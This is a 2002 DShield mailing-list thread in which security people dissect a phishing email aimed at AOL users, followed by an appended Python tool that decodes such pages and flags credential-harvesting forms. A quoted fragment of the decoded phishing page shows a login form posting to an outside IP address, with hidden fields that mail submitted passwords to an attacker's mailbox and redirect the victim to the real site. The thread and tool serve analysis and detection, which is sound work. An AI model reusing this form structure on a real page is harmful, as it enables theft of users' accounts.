[Dshield] OT?: some stuff, a firewall won't catch

Johannes Ullrich jullrich at euclidian.com
Fri Nov 15 23:10:48 GMT 2002


already did... but there is little AOL can do. I also sent a note
to the site hosting the page... but haven't done anything yet about the 
email recipient.


On Fri, 15 Nov 2002 16:18:30 -0600
"Doug" <doug at dwhite.ws> wrote:

> You should forward that stuff to AOL
> 
> They will go after them big time!
> 
> ================================
> This address is filtered through the open relay database at
> http://www.ordb.org
> and is virus scanned by ANTIVIR
> http://www.dwhite.ws
> mailto:doug at dwhite.ws
> ================================
> ----- Original Message -----
> From: "Patrick Oonk" <patrick.oonk at pine.nl>
> To: <list at dshield.org>
> Cc: <abuse at aol.com>; <abuse at verio.net>; <abuse at swbell.net>
> Sent: Friday, November 15, 2002 1:34 PM
> Subject: Re: [Dshield] OT?: some stuff, a firewall won't catch
> 
> 
> | On Fri, Nov 15, 2002 at 11:09:17AM -0500, Bernd Loske wrote:
> | > First:
> | > It's your own fault, if you really go to the site below and try to log in
> | > with your account/password -- you have been warned.
> |
> | The page is 'encrypted' using URl encoding.
> |
> | I used the following simple perl script (tnx to
> | http://tech-web.net/perl_memo.html)  to decode it.
> |
> | foreach(<>) {
> |   print URLd($_);
> | }
> |
> | sub URLd{
> | my $URLdecode=shift;
> | $URLdecode=~tr/+/ /;
> | $URLdecode=~s/%([a-fA-F0-9]{2})/pack("C",hex($1))/eg;
> | return $URLdecode;}
> |
> | $ perl ud < index.html |more
> |
> | The most noticeable part is the following:
> |
> | <form action="http://64.143.44.63/cgi-local/crow.cgi"
> | method="POST"name="login">^M
> | ^M
> | ^M
> | <!-- This is the email where they go -->^M
> | ^M
> | <input type="hidden" name="recipient"
> | value="JoshuaKneeland at email.com">^M
> | ^M
> | <!-- This is the email where they go.. end. -->^M
> | ^M
> | ^M
> | ^M
> | <input type="hidden"^M
> |     name="subject" value="gp says kristi is god"><input^M
> |     type="hidden" name="redirect"^M
> |     value="http://love.aol.com/LoveMain/"><input type="hidden"^M
> |     name="phish" value><table border="0" cellpadding="2"^M
> |     cellspacing="0" align="center">^M
> |
> | Also notice the CR's to end lines and the fact that parts of
> | it are created with Frontpage: the signs of a true loser.
> |
> | Patrick
> |
> | >
> | > I found the email below in the inbox of my AOL account (yeap - still have
> | > that) this morning. I usually would have deleted it right away, but I was
> | > curious about what these spammers try now, to get your time and money. So --
> | > fire up lynx and go to the referenced page -- well -- after getting the
> | > source and making it readable, it revealed a nice piece of social
> | > engineering. The casual observer might really think that he logs into
> | > AOL. And in doing so, his/her account/password gets posted to some web
> | > server in the process. I wonder how many AOL accounts got compromised? ...
> | >
> | > How do you catch that, except telling everybody over and over not to click
> | > on links, to trust nobody and that the internet has become a bad place to be?
> | >
> | >
> | >
> | >
> | > -----Original Message-----
> | > From: RuffRyderLK at aol.com [mailto:RuffRyderLK at aol.com]
> | > Sent: Thursday, November 14, 2002 7:08 PM
> | > To: undisclosed-recipients:
> | > Subject: You have an admirer!
> | >
> | >
> | > Someone has sent you a secret message. <A
> | > HREF=http://members.truepath.com/vegazisfun/>Click here to redeem your
> | > message now!</A>
> | >
> | > _______________________________________________
> | > Dshield mailing list
> | > Dshield at dshield.org
> | > To change your subscription options (or unsubscribe), see:
> | > http://www.dshield.org/mailman/listinfo/list
> |
> | --
> |  Patrick Oonk    -   Pine Digital Security    -   patrick.oonk at pine.nl
> |  T:+31-70-3111010 - F:+31-70-3111011 - Read news at http://security.nl
> |  PGPid A4E74BBF  fp A7CF 7611 E8C4 7B79 CA36  0BFD 2CB4 7283 A4E7 4BBF
> |                   One thing less to worry about...
> |  Excuse of the day: Electricians made popcorn in the power supply
> |


-- 
--------------------------------------------------------------------
jullrich at euclidian.com             Collaborative Intrusion Detection
                                         join http://www.dshield.org
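Added example (Python; not part of the thread and not Patrick's Perl script): it performs the same URL-decoding step his snippet does, then parses the decoded HTML for the indicators the thread points out in the form, an action that posts to a bare IP address on a host other than the page's, and FormMail-style hidden `recipient` and `redirect` fields that mail the submitted credentials away and send the victim on to the real site. The sample page, the IP address and the mailbox in it are constructed placeholders.

```python
"""Decode a URL-encoded HTML page (the same transform as the thread's Perl URLd)
and flag the credential-harvesting form indicators the thread points out."""
import ipaddress
from html.parser import HTMLParser
from urllib.parse import unquote_plus, urlsplit

class FormCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.forms = []  # one dict per <form>: its action and hidden inputs

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)  # a None value means the attribute had no value (e.g. bare 'value')
        if tag == "form":
            self.forms.append({"action": a.get("action") or "", "hidden": {}})
        elif tag == "input" and (a.get("type") or "").lower() == "hidden" and self.forms:
            self.forms[-1]["hidden"][a.get("name") or ""] = a.get("value") or ""

def find_harvest_forms(encoded_page: str, page_host: str) -> list:
    """Return (action_host, [reasons]) for each suspicious form on the page."""
    parser = FormCollector()
    parser.feed(unquote_plus(encoded_page))  # '+' -> space, %XX -> char, like URLd()
    hits = []
    for form in parser.forms:
        host = urlsplit(form["action"]).hostname or page_host  # relative action: same host
        hidden = form["hidden"]
        reasons = []
        try:
            ipaddress.ip_address(host)
            reasons.append("form posts to a bare IP address")
        except ValueError:
            pass
        if host != page_host:
            reasons.append("form posts to a different host than the page it is on")
        if "@" in hidden.get("recipient", ""):
            reasons.append("hidden 'recipient' mails submissions to " + hidden["recipient"])
        if hidden.get("redirect"):
            reasons.append("hidden 'redirect' sends the victim on to " + hidden["redirect"])
        if reasons:
            hits.append((host, reasons))
    return hits

# Constructed sample shaped like the decoded form quoted in the thread; the IP (RFC 5737)
# and mailbox (.invalid) are placeholders, not the values from the real page.
SAMPLE = ("%3Cform+action%3D%22http%3A%2F%2F192.0.2.10%2Fcgi-local%2Fcrow.cgi%22+method%3D%22POST%22%3E"
          "%3Cinput+type%3D%22hidden%22+name%3D%22recipient%22+value%3D%22drop%40example.invalid%22%3E"
          "%3Cinput+type%3D%22hidden%22+name%3D%22redirect%22+value%3D%22http%3A%2F%2Flove.aol.com%2FLoveMain%2F%22%3E"
          "%3Cinput+type%3D%22hidden%22+name%3D%22phish%22+value%3E%3Cinput+name%3D%22password%22%3E%3C%2Fform%3E")
```

Running `find_harvest_forms(SAMPLE, "members.truepath.com")` reports the one form with all four reasons; a form whose action is a relative path on the page's own host and has no such hidden fields yields nothing.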